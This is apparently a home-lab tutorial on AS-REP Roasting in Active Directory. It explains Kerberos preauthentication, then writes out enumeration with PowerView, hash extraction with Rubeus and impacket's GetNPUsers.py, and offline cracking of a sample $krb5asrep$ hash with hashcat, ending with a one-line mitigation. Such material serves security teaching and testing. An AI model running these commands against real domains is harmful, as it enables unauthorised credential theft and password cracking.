AS-REP Roasting Attack

Definition

AS-REP Roasting is an attack against Kerberos for user accounts that do not require pre-authentication. preauthentication is the first step in Kerberos authentication, and is designed to prevent brute-force password guessing attacks.

Theory & Background

During preauthentication, a user will enter their password which will be used to encrypt a timestamp, send that to domain controller and then the domain controller will attempt to decrypt it and validate request. From there, the TGT will be issued for the user to use for future authentication.

The AS-REP response has two parts one is the TGT ticket encrypted using the KRBTGT Account's NTLM hash and another one is the session key (enc-part in image 2) which is encrypted using user account's NTLM hash. If preauthentication isn’t enabled, an attacker can send an AS-REQ for any user that doesn’t have preauth required and receive a bit of encrypted material back that can be cracked offline to reveal the target user’s password. If you’re already an authenticated (but otherwise unprivileged) user, you can easily enumerate what users in the domain have this setting with the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).

Luckily, preauthentication is required by default in Active Directory. However, this can be controlled by a user account control setting on every user account

blackwidow@REDWOLF.LOCAL configured with 'Do not require Kerberos preauthentication'

Snapshot of wireshark

My Lab environment for this lab is:

1. blackwidow@REDWOLF.LOCAL - User with kerberos preauthentication disabled

2. redwolf-dc - Domain Controller

Abuse

There are so many tools that can be used to perform AS-REP Roasting attack, however i will be demonstrating with Rubeus (for windows) and GetNPUsers.py (for linux) from impacket scripts.

Execution with Rubeus

Users that have Pre-Authentication disabled (This command requires powerview to be loaded on the memory)

Get-DomainUser -PreauthNotRequired

Then we can use Rubeus.exe to dump the session key present in AS-REP

.\Rubeus.exe asreproast /nowrap

Execution with GetNPUsers

Install the impacket scripts

sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
sudo python3 ./setup.py install

Enumerate the list of users present in the domain and use it while executing GetNPUsers.py

GetNPUsers.py REDWOLF.LOCAL/blackwidow@redwolf.local -dc-ip 192.168.62.2

Cracking the AS-REP Hash

Say this is the hash we get for the potential victim:

$krb5asrep$blackwidow@redwolf.local:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213

We need into insert 23 after $krb5asrep$

$krb5asrep$23$blackwidow@redwolf.local:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213

Then we can use john or hashcat tool to crack the hash

hashcat -m 18200 '$krb5asrep$23$blackwidow@redwolf.local:0AC0F9425FEA56FBDC65EDC84DA88275$1BBC8576E21155EA6DBF234B22860EB2887A283E7F4CCFBDFA09DB48354C7533CF5DCC1E5929A11FAEC8A7BE5178758811606A75964DBD7A348F123ED2E64DC53434A660B5789B533DE90E049CC1F4DDD0E1D72778796EB22F1BB2DA4F7DB1CBC6705D8DC6360396F7C0586C1CC615E1CF8F666D6986D22C35852A981111B195F3248FB4D69B60999E642BE15099DA3FFFC4844A002B5491E15FDF76B3E88355846DAE95E8F5953BEC64AD8C52D5F3C02C07CD6B60B9D653AE9FB6731C73F01AE9AD06127E89CA6ECB6549CCEC10B9001C45267DF7877EBE11D15C92811CC71B103836257447E3579A4820102213' ~/Wordlist/rockyou.txt

Mitigation

Uncheck 'Do not require Kerberos preauthentication' in the Account Options of the user account

References

• ​https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat​

• ​https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/​

• ​https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/